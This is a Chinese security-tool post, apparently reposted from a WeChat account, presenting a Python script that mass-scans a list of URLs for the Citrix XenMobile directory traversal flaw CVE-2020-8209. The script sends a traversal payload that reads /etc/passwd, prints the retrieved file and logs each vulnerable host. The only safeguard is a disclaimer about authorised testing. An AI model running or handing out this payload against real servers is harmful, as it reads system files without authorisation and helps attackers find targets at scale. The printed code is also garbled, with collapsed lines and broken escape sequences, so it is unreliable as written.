Citrix XenMobile目录遍历扩展(CVE-2020-8209)批量检测脚本

  • A+
所属分类:安全工具

使用方法&免责声明

该脚本为Citrix XenMobile目录遍历扩展(CVE-2020-8209)批量检测脚本。

使用方法:Python CVE-2020-8209-Multiple.py url.txt

存在漏洞的地址输出在vul.txt中

影响版本:
  • RP2之前的Citrix XenMobile服务器10.12

  • RP4之前的Citrix XenMobile服务器10.11

  • RP6之前的Citrix XenMobile服务器10.10

  • RP5之前的Citrix XenMobile服务器10.9

工具仅用于安全人员安全测试,任何未授权检测造成的直接或间接的后果及损失,均由使用者本人负责

Citrix XenMobile目录遍历扩展(CVE-2020-8209)批量检测脚本

#!/usr/bin/env python# coding:utf-8# author:B1anda0
import requests,sys,coloramafrom colorama import *init(autoreset=True)

banner='''33[1;33;40m _______ ________ ___ ___ ___ ___ ___ ___ ___ ___ / ____ / / ____| |__ / _ __ / _ / _ __ / _ / _ | | / /| |__ ______ ) | | | | ) | | | |_____| (_) | ) | | | | (_) || | / / | __|______/ /| | | |/ /| | | |______> _ < / /| | | |__, || |____ / | |____ / /_| |_| / /_| |_| | | (_) / /_| |_| | / / _____| / |______| |____|___/____|___/ ___/____|___/ /_/ '''

def XenMobile(): headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"} payload= '/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd' poc=urls+payload try: requests.packages.urllib3.disable_warnings()#解决InsecureRequestWarning警告 response=requests.get(poc,headers=headers,timeout=10,verify=False) if response.status_code==200 and "root" in response.content: print(u'33[1;31;40m[+]{} is citrix xenmobile directory traversal vulnerability'.format(urls)) print(response.content) #将漏洞地址输出在Vul.txt中 f=open('./vul.txt','a') f.write(urls) f.write('n') else: print('33[1;32;40m[-]{} None'.format(urls)) except: print('{} request timeout'.format(urls))

if __name__ == '__main__': print (banner) if len(sys.argv)!=2: print('Example:python CVE-2020-8209.py url.txt') else: file = open(sys.argv[1]) for url in file.readlines(): urls=url.strip() if urls[-1]=='/': urls=urls[:-1] XenMobile() print ('Check Over')
项目地址:https://github.com/B1anda0/CVE-2020-8209/blob/main/CVE-2020-8209-Multiple.py

Citrix XenMobile目录遍历扩展(CVE-2020-8209)批量检测脚本

本文始发于微信公众号(Ots安全):Citrix XenMobile目录遍历扩展(CVE-2020-8209)批量检测脚本

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: